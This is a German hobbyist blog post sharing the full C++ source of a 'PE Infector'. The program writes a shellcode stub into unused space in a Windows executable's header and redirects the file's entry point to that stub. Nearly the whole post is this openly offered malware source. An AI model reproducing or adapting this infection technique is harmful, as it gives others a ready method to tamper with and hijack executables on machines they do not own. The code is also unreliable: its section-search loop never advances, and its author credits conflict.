Freitag, 15. April 2011

[C++] PE Infector

HeyHo,
Krame grade ein bisschen in meinen alten HDD's rum & hab' unter anderem meinen, jetzt leider schon heuristisch detected, PE Infector gefunden.


/* Simple Pe Infector By fred (c) /* infecting method:
   find a free space in pe header;
   how it works?
   we find PointerToRawData of .text section because system loader put's her first 
   then we use my simple formulation :
   delta = PointerToRawData - sizeof(code) and scan this space of memmory if it's free infect file and 
   change OEP to delta.
   may be it will be more correct to use 
   delta = PointerToRawData - (sizeof(code) + some more) 

*/
/* iamge presentation
   ------------------
   |  PE HEADER     |
   |________________|
   |                |
   |                |
   |  OBJECT TABLE  |
   |________________|                
   |                |
   |                |
   | FREE SPACE     |          
   | our code       |
   |________________|
   |                |
   |.text section   |
   | next section   |
   | next section   |
   | .............. |
   |                |
   ------------------
*/
#include<windows.h>
#include<stdio.h>
unsigned long GetTextSectionOffset(PIMAGE_SECTION_HEADER pSectionHeader , int NumberOfSections)
{
 while(NumberOfSections > 0)
 {
  if( !strcmpi((char*)pSectionHeader->Name , ".text"))
  {
   return pSectionHeader->PointerToRawData;
  }
 }
 /* we did not find .text section */
 return 0;
}
/* entry point */
int main(int argc , char *argv[])
{
 HANDLE hFile;
 HANDLE hMap;
 char *MappedFile = 0;
 DWORD FileSize; /* file size */
 DWORD delta;   
 DWORD SectionOffset; /* .text section offset*/
 DWORD func_addr;
 IMAGE_DOS_HEADER *pDosHeader;
 IMAGE_NT_HEADERS *pNtHeader;
 IMAGE_SECTION_HEADER *pSecHeader;
 /* shell code*/
 char code[] = "\x6A\x00"              /*push 0 */
            "\xB8\x00\x00\x00\x00"  /*mov eax , func_addr (address will be inserted automaticly)*/
            "\xFF\xD0";             /*call eax */
 if(argc < 2)
 {
  printf("parameters : ssv.exe [filename] \n");
  printf("simple pe infector by _antony \n");
  return 0;
 }
 printf("target: [%s] \n" , argv[1]);
 /* open file */
 hFile = CreateFile(argv[1] , 
                 GENERIC_WRITE | GENERIC_READ ,
        0 ,
        0 ,
        OPEN_EXISTING ,
        FILE_ATTRIBUTE_NORMAL ,
        0);
 if(hFile == INVALID_HANDLE_VALUE)
 {
  printf("[Error]: Can't open File! Error code : %d" , GetLastError());
  return -1;
 }
 /* get file size */
 FileSize = GetFileSize(hFile , 0 );
 printf("[File Size ]: %d \n", FileSize);
 /* mapping file */
 hMap = CreateFileMapping(hFile ,
                       0 ,
        PAGE_READWRITE ,
        0 , 
        FileSize ,
        0);
 if(hMap == INVALID_HANDLE_VALUE)
 {
  printf("[Error]: Can't map file! Error code: %d\n" , GetLastError());
  CloseHandle(hFile);
  return -1;
 }
 MappedFile = (char*)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , FileSize);
 if(MappedFile == NULL)
 {
  printf("[Error]: Can't map file! Error code %d\n", GetLastError());
  CloseHandle(hFile);
  CloseHandle(hMap);
  UnmapViewOfFile(MappedFile);
  return -1;
 }
 pDosHeader = (IMAGE_DOS_HEADER*)MappedFile;
 pNtHeader  = (IMAGE_NT_HEADERS*)((DWORD)MappedFile + pDosHeader->e_lfanew);
 pSecHeader = IMAGE_FIRST_SECTION(pNtHeader);
    /* get .text section PointerToRawData*/
 SectionOffset = GetTextSectionOffset(pSecHeader , pNtHeader->FileHeader.NumberOfSections);
 if(SectionOffset == 0)
 {
  printf("[Error]: Can't find .text section!\n");
  CloseHandle(hFile);
  CloseHandle(hMap);
  UnmapViewOfFile(MappedFile);
  return -1;
 }
 delta = SectionOffset - sizeof(code);
 int i;
 BYTE check;
 printf("scanning...\n");
 /* scanning space  if there are only 00 then we infect file */
 for(i=0 ; i<sizeof(code) ; i++)
 {
      check = *((BYTE*)MappedFile + delta + i);
   printf("%X \t", check);
   if(check != 0)
   {
    printf("There is some data...\n");
    CloseHandle(hFile);
    CloseHandle(hMap);
    UnmapViewOfFile(MappedFile);
    return -1;
   }
 }
   printf("Space if free , infecting File...\n");
   /* insert function address in shell code */
   func_addr = (DWORD)GetProcAddress( LoadLibrary("kernel32.dll") , "ExitProcess");
   for(i=0 ; i < sizeof(code) ; i++ )
   {
    if( *(DWORD*)&code[i] == 0x00000B8)
    {
     *(DWORD*)(code+i+1)= func_addr;
    }
   }
   printf("Old Entry Point : %08X \n" , pNtHeader->OptionalHeader.AddressOfEntryPoint);
   memcpy(MappedFile+delta , code , sizeof(code));
   /* new entry point */
   pNtHeader->OptionalHeader.AddressOfEntryPoint = delta;
          printf("File infected!\n");
   printf("New Entry Point: %08X \n" , delta);
   CloseHandle(hFile);
   CloseHandle(hMap);
   UnmapViewOfFile(MappedFile);
   return 0;
}

Großes Danke an meine damaligen c++ Leute ;-)


~fred

Keine Kommentare:

Kommentar veröffentlichen